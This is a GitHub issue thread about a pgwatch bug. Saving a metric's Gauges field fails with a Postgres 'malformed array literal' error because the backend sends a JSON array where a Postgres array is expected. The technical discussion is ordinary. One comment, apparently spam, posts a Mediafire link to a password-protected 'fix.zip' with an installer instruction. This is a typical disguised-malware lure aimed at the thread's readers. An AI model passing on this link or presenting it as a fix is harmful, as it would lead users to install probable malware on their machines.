### ISSUE TITLE
Error saving existing metrics in UI

### ISSUE THREAD

**Issue by ondar** [cybertec-postgresql/pgwatch#532]
### Discussed in https://github.com/cybertec-postgresql/pgwatch/discussions/530

<div type='discussions-op-text'>

<sup>Originally posted by **ondar** August 27, 2024</sup>

Error "ERROR: malformed array literal: "["is_failing_int","seconds_since_last_failure"]" (SQLSTATE 22P02)" saving existing metrics "archiver". So it seems it have something to do with saving the field "Gauges" in tab "SETTINGS".

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ondar** [comment]
I see in DB that field have value of "{is_failing_int,seconds_since_last_failure}" but save payload sends value "Gauges":["is_failing_int","seconds_since_last_failure"]. So maybe its only wrong type of parenthesis?

**Comment by ondar** [comment]
@pashagolub seems to be backend error after all. This is error I got from backend log. Seems it updates column of type[] with value in [] and not in {}:
```
2024-08-28 12:10:12.292 [ERROR] [sql:UPDATE pgwatch.metric SET 
2024-08-28T12:10:12.293087984Z 	sqls = $2, init_sql = $3, description = $4, node_status = $5, gauges = $6, is_instance_level = $7, storage_name = $8
2024-08-28T12:10:12.293091130Z 	WHERE name = $1] [args:[archiver {"11":"select /* pgwatch_generated */\n  (extract(epoch from now (truncated 406 bytes)    ["is_failing_int","seconds_since_last_failure"] true ]] [err:ERROR: malformed array literal: "["is_failing_int","seconds_since_last_failure"]" (SQLSTATE 22P02)] [pid:19617] [time:788.58µs] Query
```

**Comment by ondar** [comment]
Found it in `internal/metrics/postgres.go` method `UpdateMetric`, but I have no idea how to marshal that `metric.Gauges` array better so it is actually saved.

**Comment by pashagolub** [comment]
Would you please provide steps to reproduce the issue? I'm kinda lost in discussion. Is this a prometheus related, right?

**Comment by ondar** [comment]
No, its again UI related. Navigate to metrics tab, press edit on metric named "archiver" and press button "Update". Will be probably the same on any metric that have something in field "Gauges".
